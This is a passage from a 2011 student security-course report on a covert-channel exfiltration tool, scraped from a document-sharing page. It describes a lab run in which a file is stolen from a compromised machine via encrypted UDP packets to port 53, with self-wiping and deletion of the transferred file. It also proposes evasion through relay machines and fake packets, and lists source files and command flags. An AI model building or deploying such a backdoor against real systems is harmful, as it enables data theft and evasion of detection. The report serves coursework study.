BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows the application on the attackers local machine being shut down after sending the command execution message, and then a file transfer message is sent for /tmp/ls along with instructions to remove this file when its transfer is complete, and have the application on the compromised machine wipe itself when done as well. No further communication would be possible with the compromised machine after such a message packet is sent from the attacker.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows the file transfer message being sent to the compromised machine at 192.168.0.199, followed by incoming packets with the contents of the requested file. The file transfer is completed to /tmp/received at 12:5:11.736649 and verification of the expected file size of 320 bytes is shown below at 12:5:11.736966.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows the contents of the exfiltrated file received to /tmp/received and the move of this file to the home_ls.exfil file which is included on the accompanying DVD. The log file for all this activity is also shown below as moved to attacker2.log, which is also included on the accompanying DVD.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below is from the compromised machine, showing startup of the application, a successful reset of the password at 12:3:31.863068, a successful transfer of the /tmp/ls file at 12:5:3.92083 and the wiping of the application so it can no longer be run. The /tmp/ls file was also deleted in this case, but evidence of this fact was unfortunately not captured. The tcpdump file victim2.pcap is also shown being created below, with 142 captured packets. The following page shows this victim2.pcap file in Wireshark.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ The screen snapshot below shows the victim2.pcap file from the compromised machine. Packet 96 is the last packet sent to the attacker with information about exfiltration of the /tmp/ls file. This victim2.pcap file is included on the accompanying DVD.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 6. Known Weaknesses and Recommended Future Work The primary weakness of this projects application is the direct communication between the compromised machine and the attackers local machine. An adversary observing the packets exchanged between the two machines would be able to learn the IP address of each endpoint. The UDP protocol chosen, the random port numbers used, the avoidance of open sockets, the random spacing of packets, and the encryption of each packet are good design choices to minimize detection by observers. However, an improved design would be to include one or more intermediary machines that transferred packets to and from the compromised machine, and to and from the attackers local machine. Enabling the application to recognize a new forward this message, and ensuring there are multiple compromised machines to accomplish this is recommended by the author. Future enhancements are also recommended to enable an additional reset option message packet that works in a similar fashion to the reset password message. Any of the various options could be dynamically changed by the attacker to better suit her needs or limitations. Changing back and forth between UDP and TCP, is one example of this; changing packet intervals is another; sending occasional fake packets intermixed with real packets is another.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ 7. Summary and Conclusions This project successfully demonstrated exfiltration of a file from a compromised machine over a covert channel. The attacker was able to specify a file on the compromised machine and receive a copy of the file via 128-byte packets sent at random intervals using the UDP protocol to port 53 on the attackers local machine. These packets were encrypted with a shared password known only by the attacker and the application running on the compromised machine. Complete source code, log files, and Wireshark packet capture files are included on the accompanying DVD for confirmation of design work and evidence of test results. A GNU/Linux 64bit executable ./invizible file is also included on the accompanying DVD.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Appendix The following files are included on the accompanying DVD:
/ root directory: COMP8505_FinalProject_final.docx COMP8505_FinalProject_final.doc COMP8505_FinalProject_final.pdf FinalProject11.pdf *.packet *.pcap /bin/x86_64 invizible /bin/x86 invizible /src/ directory: common.h pkclient.h pkcommon.h pkserver.h hostnames.h hpingwrap.h invizible.h libevwrap.h mypcap.h parms.h common.c pkclient.c pkcommon.c pkserver.c hostnames.c hpingwrap.c invizible.c libevwrap.c main.c mypcap.c parms.c INSTALL LICENSE TODO /src/fwknop directory: /src/hping directory: /src/lib directory: /src/libev directory: /src/pcap directory: (this file) (doc version of this file) (pdf version of this file) (copy of project description) (packet files from client and server testing) (various Wireshark packet capture files)
(64-bit GNU-Linux executable)
(32-bit GNU-Linux executable)
(c header file for common functions) (c header file for port knocking client functions) (c header file for port knocking common functions) (c header file for port knocking server functions) (c header file for hostnames functions) (c header file for embedded hping) (c header file for invizible functions) (c header file for embedded libev) (c header file for customized pcap functions) (c header file for parameter functions) (c source file for common functions) (c source file for port knocking client functions) (c source file for port knocking common functions) (c source file for port knocking server functions) (c source file for hostnames functions) (c source file for embedded hping) (c source file for invizible functions) (c source file for embedded libev) (c main source file) (c source file for customized pcap functions) (c source file for parameter functions) (notes and instructions on installation) (license and copyright statements) (list of outstanding and planned items) (embedded and modified fwknop headers) (embedded hping headers and source) (libpcap and libfko libraries not used) (embedded libev headers and source) (embedded subset of libpcap headers and source)
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Bibliography [1] invizible open source project available on Launchpad.net web site at https://launchpad.net/invizible. [2] User Datagram Protocol discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/User_Datagram_Protocol as of June 19, 2011. [3] libpcap discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Libpcap as of June 19, 2011. [4] The open source libpcap library is available, and documented, at the tcpdump.org web site at http://www.tcpdump.org as of May 29, 2011. The Microsoft Windows port of libpcap is available from the winpcap.org web site at http://www.winpcap.org as of May 29, 2011. [5] The open source fwknop project is available, and documented, at the cipherdyne.org web site at http://www.cipherdyne.org/fwknop as of May 29, 2011. [6] AES Advanced Encryption Standard discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Rijndael as of June 19, 2011. [7] SHA-2 discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Sha256 as of June 19, 2011. [8] Replay attack discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Replay_attack as of June 19, 2011. [9] inotify discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Inotify as of June 20, 2011.
BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due Date: June 21, 2011 Author: Arthur (Wesley) Kenzie A00242330 Final Project: Covert Channel Exfiltration (Final Version) ______________________________________________________________________________ Credits Linux is a registered trademark of Linus Torvalds. libpcap examples Copyright (c) Martin Casado & Richard Stevens and Aman Abdulla: April 23, 2006 Covert_TCP 1.0 - Covert channel file transfer for Linux Written by Craig H. Rowland (crowland@psionic.com) Copyright 1996 Craig H. Rowland (11-15-96) NOT FOR COMMERCIAL USE WITHOUT PERMISSION. libev Copyright (c) 2007,2008,2009 Marc Alexander Lehmann bind Copyright (c) 2004-2011 Internet Systems Consortium, Inc. ("ISC") and Copyright (c) 1996-2003 Internet Software Consortium. and Portions Copyright (c) 1996-2001 Nominum, Inc. hping3 Copyright (c) 1999 Salvatore Sanfilippo <antirez@invece.org> license: This software is under GPL version 2 of license eventdns Version: 0.1b developed by Adam Langley <agl@imperialviolet.org> libevent evdns Copyright (c) 2000-2007 Niels Provos <provos@citi.umich.edu> and Copyright (c) 2007-2010 Niels Provos and Nick Mathewson fwknop Copyright (c) 2009 Damien S. Stuart (dstuart@dstuart.org) and Copyright (c) Michael Rash (mbr@cipherdyne.org) md5.c implementation of the MD5 message-digest algorithm due to Ron Rivest. Code written by Colin Plumb in 1993, with no copyright claimed. sha1.c based on NIST Secure Hash Algorithm, heavily modified by Uwe Hollerbach <uh@alumni.caltech edu> and based on Peter C. Gutmann's implementation as found in Applied Cryptography by Bruce Schneier rijndael.c implementation of the Rijndael cipher Copyright (C) 2000, 2001 Rafael R. Sevilla <sevillar@team.ph.inter.net> and currently maintained by brian d foy, <bdfoy@cpan.org> sha2.c by Aaron D. Gifford - http://www.aarongifford.com/ Copyright (c) 2000-2001, Aaron D. Gifford. All rights reserved.

BCIT COMP 8505 Final Project Covert Channel Exfiltration by Wesley Kenzie, June 2011

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

BCIT COMP 8505 Final Project Covert Channel Exfiltration by Wesley Kenzie, June 2011

Diunggah oleh

Hak Cipta:

Format Tersedia

BCIT Computing and Information Technology COMP 8505 Special Topics in Network and Security Applications Development Due

--external=xyz --ua=xxxx --testing --pksave=xxxx --pwd=xxxx

--pkaccess=xxxx/n --pk=1 --pktimeout=n

(64-bit GNU-Linux executable)

(32-bit GNU-Linux executable)

Anda mungkin juga menyukai